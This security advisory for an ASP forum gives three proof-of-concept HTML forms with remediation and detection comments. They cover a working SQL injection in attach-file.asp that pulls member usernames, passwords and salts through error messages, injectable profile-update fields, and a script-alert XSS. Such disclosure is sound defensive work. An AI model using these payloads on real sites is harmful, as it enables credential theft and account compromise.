Original Advisory: http://bugreport.ir/index.php?/37
1. Exploits/POC:

1.1. "/forums/attach-file.asp" SQL Injection POC:
-------------
    <!--
      Proof-of-concept upload form for the attach-file.asp finding.
      The untrusted value is the attachmentid query-string parameter in the
      form action, not the uploaded file. The sample value follows the number
      with a boolean clause that converts a sub-select on the members table
      to int, so per the advisory this parameter reaches the SQL text without
      numeric validation.
      NOTE(review): presumably the failed conversion returns the selected
      string inside a database error message; confirm on a test copy.
      The sub-select names username, password and salt columns, so treat
      member credentials as exposed on any affected install.
      Remediation: parse attachmentid (and mid) as integers and reject
      anything else, bind them as query parameters instead of concatenating
      them, and serve a generic error page rather than raw database errors.
      Detection: review web logs for attach-file.asp requests whose
      attachmentid is not purely numeric.
      [Site URL] and [YOUR MSG ID] are placeholders from the advisory.
    -->
    <form ENCTYPE="multipart/form-data" method="post" action="http://[Site URL]/forums/attach-file.asp?action=postupload&amp;mid=[YOUR MSG ID]&amp;attachmentid=1 or 1=convert(int,(select top 1 username%2bpassword%2bsalt from members where username<>''))">
    <!-- File field only makes the request a valid multipart upload. -->
    File : <input type='file' name='attachment' size='40'>
    <br />
    <input type='submit' value='Submit'>
    </form>
-------------
1.2. "/profile/controlpanel.asp" SQL Injection POC:
-------------
    <!--
      Proof-of-concept profile-update form for the controlpanel.asp finding.
      The advisory labels two fields, invisible and timeoffset, as injection
      points in a numeric UPDATE. They are exposed here as editable text
      inputs; every other field is sent as a fixed hidden value together
      with action=updateinfo.
      No payload is included: both marked fields carry the benign value 1.
      Remediation: convert invisible and timeoffset to integers on the server
      and reject non-numeric input, and pass them to the UPDATE as bound
      parameters rather than concatenated text.
      NOTE(review): the remaining hidden fields also look like numeric flags;
      verify that they go through the same validation.
      Detection: POST bodies are usually absent from access logs, so this
      needs request-body logging or a filter rule on these two field names.
      [Site URL] is a placeholder from the advisory.
    -->
    <form method='post' name='updateprofile' action='http://[Site URL]/profile/controlpanel.asp'>
    <!-- Field marked by the advisory as the first injection point. -->
    Injection1 (Numeric Update):<input type="text" name="invisible" value="1" />
    <br />
    <!-- Field marked by the advisory as the second injection point. -->
    Injection2 (Numeric Update):<input type="text" name="timeoffset" value="1" />
    <br />
    <!-- Fixed values that complete an otherwise ordinary profile update. -->
    <input type="hidden" name="action" value="updateinfo" />
    <input type="hidden" name="showemail" value="1" />
    <input type="hidden" name="usesignature" value="1" />
    <input type="hidden" name="viewsignature" value="1" />
    <input type="hidden" name="disablepostcount" value="1" />
    <input type="hidden" name="userichedit" value="1" />
    <input type="hidden" name="emailnotifications" value="1" />
    <input type="hidden" name="sendprivatenotifications" value="1" />
    <input type="hidden" name="includebody" value="1" />
    <input type="hidden" name="language" value="1" />
    <input type="hidden" name="disallowbroadcasts" value="1" />
    <input type="hidden" name="viewavatars" value="1" />
    <input type="submit" />
    </form>
-------------
1.3. "send-private-message.asp" XSS POC:
-------------
    <!--
      Proof-of-concept form for the send-private-message.asp XSS finding.
      The toid field is posted with a script element as its value (the usual
      harmless alert marker) together with action=post. Per the advisory the
      value is written back into a page without HTML encoding.
      NOTE(review): the page does not say whether the value is only reflected
      or also stored; confirm, since a stored value reaches other users.
      NOTE(review): toid presumably holds a numeric member id; verify.
      Remediation: validate toid as an integer on the server and reject
      anything else, HTML-encode every request value written into a response,
      and add a Content-Security-Policy as defence in depth.
      [Site URL] is a placeholder from the advisory.
    -->
    <form action="http://[Site URL]/send-private-message.asp" method="post">
    <input type="hidden" name="action" value="post" />
    <!-- The only field carrying markup; this is the value to encode or reject. -->
    <input type="text" name="toid" value="<script>alert('XSS')</script>" />
    <br />
    <input type="submit" name="" value="submit" />
    </form>
-------------